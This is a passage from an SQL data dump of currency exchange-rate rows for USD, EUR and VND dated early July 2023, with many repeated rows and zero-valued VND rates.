(6288, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-03'),
(6289, 1, 'USD', 0.000000, 2, 'EUR', 0.920300, '2023-07-03'),
(6290, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-03'),
(6291, 2, 'EUR', 0.000000, 1, 'USD', 1.086600, '2023-07-03'),
(6292, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-03'),
(6293, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-03'),
(6294, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-03'),
(6295, 1, 'USD', 1.000000, 2, 'EUR', 0.920300, '2023-07-04'),
(6296, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-04'),
(6297, 2, 'EUR', 1.000000, 1, 'USD', 1.086600, '2023-07-04'),
(6298, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-04'),
(6299, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-04'),
(6300, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-04'),
(6301, 1, 'USD', 0.000000, 2, 'EUR', 0.917520, '2023-07-04'),
(6302, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-04'),
(6303, 2, 'EUR', 0.000000, 1, 'USD', 1.089900, '2023-07-04'),
(6304, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-04'),
(6305, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-04'),
(6306, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-04'),
(6307, 1, 'USD', 1.000000, 2, 'EUR', 0.917520, '2023-07-04'),
(6308, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-04'),
(6309, 2, 'EUR', 1.000000, 1, 'USD', 1.089900, '2023-07-04'),
(6310, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-04'),
(6311, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-04'),
(6312, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-04'),
(6313, 1, 'USD', 0.000000, 2, 'EUR', 0.917520, '2023-07-04'),
(6314, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-04'),
(6315, 2, 'EUR', 0.000000, 1, 'USD', 1.089900, '2023-07-04'),
(6316, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-04'),
(6317, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-04'),
(6318, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-04'),
(6319, 1, 'USD', 1.000000, 2, 'EUR', 0.917520, '2023-07-04'),
(6320, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-04'),
(6321, 2, 'EUR', 1.000000, 1, 'USD', 1.089900, '2023-07-04'),
(6322, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-04'),
(6323, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-04'),
(6324, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-04'),
(6325, 1, 'USD', 0.000000, 2, 'EUR', 0.917520, '2023-07-04'),
(6326, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-04'),
(6327, 2, 'EUR', 0.000000, 1, 'USD', 1.089900, '2023-07-04'),
(6328, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-04'),
(6329, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-04'),
(6330, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-04'),
(6331, 1, 'USD', 1.000000, 2, 'EUR', 0.917520, '2023-07-04'),
(6332, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-04'),
(6333, 2, 'EUR', 1.000000, 1, 'USD', 1.089900, '2023-07-04'),
(6334, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-04'),
(6335, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-04'),
(6336, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-04'),
(6337, 1, 'USD', 0.000000, 2, 'EUR', 0.917520, '2023-07-04'),
(6338, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-04'),
(6339, 2, 'EUR', 0.000000, 1, 'USD', 1.089900, '2023-07-04'),
(6340, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-04'),
(6341, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-04'),
(6342, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-04'),
(6343, 1, 'USD', 1.000000, 2, 'EUR', 0.917520, '2023-07-05'),
(6344, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-05'),
(6345, 2, 'EUR', 1.000000, 1, 'USD', 1.089900, '2023-07-05'),
(6346, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-05'),
(6347, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-05'),
(6348, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-05'),
(6349, 1, 'USD', 0.000000, 2, 'EUR', 0.917850, '2023-07-05'),
(6350, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-05'),
(6351, 2, 'EUR', 0.000000, 1, 'USD', 1.089500, '2023-07-05'),
(6352, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-05'),
(6353, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-05'),
(6354, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-05'),
(6355, 1, 'USD', 1.000000, 2, 'EUR', 0.917850, '2023-07-05'),
(6356, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-05'),
(6357, 2, 'EUR', 1.000000, 1, 'USD', 1.089500, '2023-07-05'),
(6358, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-05'),
(6359, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-05'),
(6360, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-05'),
(6361, 1, 'USD', 0.000000, 2, 'EUR', 0.917850, '2023-07-05'),
(6362, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-05'),
(6363, 2, 'EUR', 0.000000, 1, 'USD', 1.089500, '2023-07-05'),
(6364, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-05'),
(6365, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-05'),
(6366, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-05'),
(6367, 1, 'USD', 1.000000, 2, 'EUR', 0.917850, '2023-07-05'),
(6368, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-05'),
(6369, 2, 'EUR', 1.000000, 1, 'USD', 1.089500, '2023-07-05'),
(6370, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-05'),
(6371, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-05'),
(6372, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-05'),
(6373, 1, 'USD', 0.000000, 2, 'EUR', 0.917850, '2023-07-05'),
(6374, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-05'),
(6375, 2, 'EUR', 0.000000, 1, 'USD', 1.089500, '2023-07-05'),
(6376, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-05'),
(6377, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-05'),
(6378, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-05'),
(6379, 1, 'USD', 1.000000, 2, 'EUR', 0.917850, '2023-07-05'),
(6380, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-05'),
(6381, 2, 'EUR', 1.000000, 1, 'USD', 1.089500, '2023-07-05'),
(6382, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-05'),
(6383, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-05'),
(6384, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-05'),
(6385, 1, 'USD', 0.000000, 2, 'EUR', 0.917850, '2023-07-05'),
(6386, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-05'),
(6387, 2, 'EUR', 0.000000, 1, 'USD', 1.089500, '2023-07-05'),
(6388, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-05'),
(6389, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-05'),
(6390, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-05'),
(6391, 1, 'USD', 1.000000, 2, 'EUR', 0.917850, '2023-07-06'),
(6392, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-06'),
(6393, 2, 'EUR', 1.000000, 1, 'USD', 1.089500, '2023-07-06'),
(6394, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-06'),
(6395, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-06'),
(6396, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-06'),
(6397, 1, 'USD', 0.000000, 2, 'EUR', 0.919200, '2023-07-06'),
(6398, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-06'),
(6399, 2, 'EUR', 0.000000, 1, 'USD', 1.087900, '2023-07-06'),
(6400, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-06'),
(6401, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-06'),
(6402, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-06'),
(6403, 1, 'USD', 1.000000, 2, 'EUR', 0.919200, '2023-07-06'),
(6404, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-06'),
(6405, 2, 'EUR', 1.000000, 1, 'USD', 1.087900, '2023-07-06'),
(6406, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-06'),
(6407, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-06'),
(6408, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-06'),
(6409, 1, 'USD', 0.000000, 2, 'EUR', 0.919200, '2023-07-06'),
(6410, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-06'),
(6411, 2, 'EUR', 0.000000, 1, 'USD', 1.087900, '2023-07-06'),
(6412, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-06'),
(6413, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-06'),
(6414, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-06'),
(6415, 1, 'USD', 1.000000, 2, 'EUR', 0.919200, '2023-07-06'),
(6416, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-06'),
(6417, 2, 'EUR', 1.000000, 1, 'USD', 1.087900, '2023-07-06'),
(6418, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-06'),
(6419, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-06'),
(6420, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-06'),
(6421, 1, 'USD', 0.000000, 2, 'EUR', 0.919200, '2023-07-06'),
(6422, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-06'),
(6423, 2, 'EUR', 0.000000, 1, 'USD', 1.087900, '2023-07-06'),
(6424, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-06'),
(6425, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-06'),
(6426, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-06'),
(6427, 1, 'USD', 1.000000, 2, 'EUR', 0.919200, '2023-07-06'),
(6428, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-06'),
(6429, 2, 'EUR', 1.000000, 1, 'USD', 1.087900, '2023-07-06'),
(6430, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-06'),
(6431, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-06'),
(6432, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-06'),
(6433, 1, 'USD', 0.000000, 2, 'EUR', 0.919200, '2023-07-06'),
(6434, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-06'),
(6435, 2, 'EUR', 0.000000, 1, 'USD', 1.087900, '2023-07-06'),
(6436, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-06'),
(6437, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-06'),
(6438, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-06'),
(6439, 1, 'USD', 1.000000, 2, 'EUR', 0.919200, '2023-07-07'),
(6440, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-07'),
(6441, 2, 'EUR', 1.000000, 1, 'USD', 1.087900, '2023-07-07'),
(6442, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-07'),
(6443, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-07'),
(6444, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-07'),
(6445, 1, 'USD', 0.000000, 2, 'EUR', 0.917520, '2023-07-07'),
(6446, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-07'),
(6447, 2, 'EUR', 0.000000, 1, 'USD', 1.089900, '2023-07-07'),
(6448, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-07'),
(6449, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-07'),
(6450, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-07'),
(6451, 1, 'USD', 1.000000, 2, 'EUR', 0.917520, '2023-07-07'),
(6452, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-07'),
(6453, 2, 'EUR', 1.000000, 1, 'USD', 1.089900, '2023-07-07'),
(6454, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-07'),
(6455, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-07'),
(6456, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-07'),
(6457, 1, 'USD', 0.000000, 2, 'EUR', 0.917520, '2023-07-07'),
(6458, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-07'),
(6459, 2, 'EUR', 0.000000, 1, 'USD', 1.089900, '2023-07-07'),
(6460, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-07'),
(6461, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-07'),
(6462, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-07'),
(6463, 1, 'USD', 1.000000, 2, 'EUR', 0.917520, '2023-07-07'),
(6464, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-07'),
(6465, 2, 'EUR', 1.000000, 1, 'USD', 1.089900, '2023-07-07'),
(6466, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-07'),
(6467, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-07'),
(6468, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-07'),
(6469, 1, 'USD', 0.000000, 2, 'EUR', 0.917520, '2023-07-07'),
(6470, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-07'),
(6471, 2, 'EUR', 0.000000, 1, 'USD', 1.089900, '2023-07-07'),
(6472, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-07'),
(6473, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-07'),
(6474, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-07'),
(6475, 1, 'USD', 1.000000, 2, 'EUR', 0.917520, '2023-07-07'),
(6476, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-07'),
(6477, 2, 'EUR', 1.000000, 1, 'USD', 1.089900, '2023-07-07'),
(6478, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-07'),
(6479, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-07'),
(6480, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-07'),
(6481, 1, 'USD', 0.000000, 2, 'EUR', 0.917520, '2023-07-07'),
(6482, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-07'),
(6483, 2, 'EUR', 0.000000, 1, 'USD', 1.089900, '2023-07-07'),
(6484, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-07'),
(6485, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-07'),
(6486, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-07'),
(6487, 1, 'USD', 1.000000, 2, 'EUR', 0.917520, '2023-07-08'),
(6488, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-08'),
(6489, 2, 'EUR', 1.000000, 1, 'USD', 1.089900, '2023-07-08'),
(6490, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-08'),
(6491, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-08'),
(6492, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-08'),
(6493, 1, 'USD', 0.000000, 2, 'EUR', 0.918440, '2023-07-08'),
(6494, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-08'),
(6495, 2, 'EUR', 0.000000, 1, 'USD', 1.088800, '2023-07-08'),
(6496, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-08'),
(6497, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-08'),
(6498, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-08'),
(6499, 1, 'USD', 1.000000, 2, 'EUR', 0.918440, '2023-07-08'),
(6500, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-08'),
(6501, 2, 'EUR', 1.000000, 1, 'USD', 1.088800, '2023-07-08'),
(6502, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-08'),
(6503, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-08'),
(6504, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-08'),
(6505, 1, 'USD', 0.000000, 2, 'EUR', 0.918440, '2023-07-08'),
(6506, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-08'),
(6507, 2, 'EUR', 0.000000, 1, 'USD', 1.088800, '2023-07-08'),
(6508, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-08'),
(6509, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-08'),
(6510, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-08'),
(6511, 1, 'USD', 1.000000, 2, 'EUR', 0.918440, '2023-07-08'),
(6512, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-08'),
(6513, 2, 'EUR', 1.000000, 1, 'USD', 1.088800, '2023-07-08'),
(6514, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-08'),
(6515, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-08'),
(6516, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-08'),
(6517, 1, 'USD', 0.000000, 2, 'EUR', 0.918440, '2023-07-08'),
(6518, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-08'),
(6519, 2, 'EUR', 0.000000, 1, 'USD', 1.088800, '2023-07-08'),
(6520, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-08'),
(6521, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-08'),
(6522, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-08'),
(6523, 1, 'USD', 1.000000, 2, 'EUR', 0.918440, '2023-07-08'),
(6524, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-08'),
(6525, 2, 'EUR', 1.000000, 1, 'USD', 1.088800, '2023-07-08'),
(6526, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-08'),
(6527, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-08'),
(6528, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-08'),
(6529, 1, 'USD', 0.000000, 2, 'EUR', 0.918440, '2023-07-08'),
(6530, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-08'),
(6531, 2, 'EUR', 0.000000, 1, 'USD', 1.088800, '2023-07-08'),
(6532, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-08'),
(6533, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-08'),
(6534, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-08'),
(6535, 1, 'USD', 1.000000, 2, 'EUR', 0.918440, '2023-07-09'),
(6536, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-09'),
(6537, 2, 'EUR', 1.000000, 1, 'USD', 1.088800, '2023-07-09'),
(6538, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-09'),
(6539, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-09'),
(6540, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-09'),
(6541, 1, 'USD', 0.000000, 2, 'EUR', 0.918440, '2023-07-09'),
(6542, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-09'),
(6543, 2, 'EUR', 0.000000, 1, 'USD', 1.088800, '2023-07-09'),
(6544, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-09'),
(6545, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-09'),
(6546, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-09'),
(6547, 1, 'USD', 1.000000, 2, 'EUR', 0.918440, '2023-07-09'),
(6548, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-09'),
(6549, 2, 'EUR', 1.000000, 1, 'USD', 1.088800, '2023-07-09'),
(6550, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-09'),
(6551, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-09'),
(6552, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-09'),
(6553, 1, 'USD', 0.000000, 2, 'EUR', 0.918440, '2023-07-09'),
(6554, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-09'),
(6555, 2, 'EUR', 0.000000, 1, 'USD', 1.088800, '2023-07-09'),
(6556, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-09'),
(6557, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-09'),
(6558, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-09'),
(6559, 1, 'USD', 1.000000, 2, 'EUR', 0.918440, '2023-07-09'),
(6560, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-09'),
(6561, 2, 'EUR', 1.000000, 1, 'USD', 1.088800, '2023-07-09'),
(6562, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-09'),
(6563, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-09'),
(6564, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-09'),
(6565, 1, 'USD', 0.000000, 2, 'EUR', 0.918440, '2023-07-09'),
(6566, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-09'),
(6567, 2, 'EUR', 0.000000, 1, 'USD', 1.088800, '2023-07-09'),
(6568, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-09'),
(6569, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-09'),
(6570, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-09'),
(6571, 1, 'USD', 1.000000, 2, 'EUR', 0.918440, '2023-07-09'),
(6572, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-09'),
(6573, 2, 'EUR', 1.000000, 1, 'USD', 1.088800, '2023-07-09'),
(6574, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-09'),
(6575, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-09'),
(6576, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-09'),
(6577, 1, 'USD', 0.000000, 2, 'EUR', 0.918440, '2023-07-09'),
(6578, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-09'),
(6579, 2, 'EUR', 0.000000, 1, 'USD', 1.088800, '2023-07-09'),
(6580, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-09'),
(6581, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-09'),
(6582, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-09'),
(6583, 1, 'USD', 1.000000, 2, 'EUR', 0.918440, '2023-07-10'),
(6584, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-10'),
(6585, 2, 'EUR', 1.000000, 1, 'USD', 1.088800, '2023-07-10'),
(6586, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-10'),
(6587, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-10'),
(6588, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-10'),
(6589, 1, 'USD', 0.000000, 2, 'EUR', 0.918440, '2023-07-10'),
(6590, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-10'),
(6591, 2, 'EUR', 0.000000, 1, 'USD', 1.088800, '2023-07-10'),
(6592, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-10'),
(6593, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-10'),
(6594, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-10'),
(6595, 1, 'USD', 1.000000, 2, 'EUR', 0.918440, '2023-07-10'),
(6596, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-10'),
(6597, 2, 'EUR', 1.000000, 1, 'USD', 1.088800, '2023-07-10'),
(6598, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-10'),
(6599, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-10'),
(6600, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-10'),
(6601, 1, 'USD', 0.000000, 2, 'EUR', 0.918440, '2023-07-10'),
(6602, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-10'),
(6603, 2, 'EUR', 0.000000, 1, 'USD', 1.088800, '2023-07-10'),
(6604, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-10'),
(6605, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-10'),
(6606, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-10'),
(6607, 1, 'USD', 1.000000, 2, 'EUR', 0.918440, '2023-07-10'),
(6608, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-10'),
(6609, 2, 'EUR', 1.000000, 1, 'USD', 1.088800, '2023-07-10'),
(6610, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-10'),
(6611, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-10'),
(6612, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-10'),
(6613, 1, 'USD', 0.000000, 2, 'EUR', 0.918440, '2023-07-10'),
(6614, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-10'),
(6615, 2, 'EUR', 0.000000, 1, 'USD', 1.088800, '2023-07-10'),
(6616, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-10'),
(6617, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-10'),
(6618, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-10'),
(6619, 1, 'USD', 1.000000, 2, 'EUR', 0.918440, '2023-07-10'),
(6620, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-10'),
(6621, 2, 'EUR', 1.000000, 1, 'USD', 1.088800, '2023-07-10'),
(6622, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-10'),
(6623, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-10'),
(6624, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-10'),
(6625, 1, 'USD', 0.000000, 2, 'EUR', 0.918440, '2023-07-10'),
(6626, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-10'),
(6627, 2, 'EUR', 0.000000, 1, 'USD', 1.088800, '2023-07-10'),
(6628, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-10'),
(6629, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-10'),
(6630, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-10'),
(6631, 1, 'USD', 1.000000, 2, 'EUR', 0.918440, '2023-07-11'),
(6632, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-11'),
(6633, 2, 'EUR', 1.000000, 1, 'USD', 1.088800, '2023-07-11'),
(6634, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-11'),
(6635, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-11'),
(6636, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-11'),
(6637, 1, 'USD', 0.000000, 2, 'EUR', 0.912740, '2023-07-11'),
(6638, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-11'),
